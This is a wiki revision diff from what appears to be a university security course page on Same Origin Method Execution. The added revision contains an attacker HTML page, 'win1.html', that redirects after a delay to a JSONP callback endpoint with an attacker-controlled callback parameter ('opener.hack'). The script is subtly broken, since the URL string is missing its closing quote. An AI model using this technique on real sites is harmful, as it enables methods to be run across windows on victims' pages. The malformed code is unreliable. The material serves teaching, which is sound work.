User Tools

Site Tools


secres:some

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
secres:some [2017/11/23 17:16] orelsecres:some [2024/03/18 15:06] (current) – external edit 127.0.0.1
Line 61: Line 61:
  
  
-(...)+<code html win1.html> 
 +<html> 
 +  <body> 
 +    <h1> Win 1</h1>     
 +    <p>Redirect to Vulnerable callback page in 3sec!</p> 
 +    <script> 
 +      function waitForDOM() { 
 +        window.location.replace("http://www.labri.fr/perso/esnard/php/callback.php?callback=opener.hack); 
 +      } 
 +      setTimeout(waitForDOM,3000)
 +    </script>     
 +  </body> 
 + 
 +</html> 
 +</code>
  
  
secres/some.1511457397.txt.gz · Last modified: 2024/03/18 15:05 (external edit)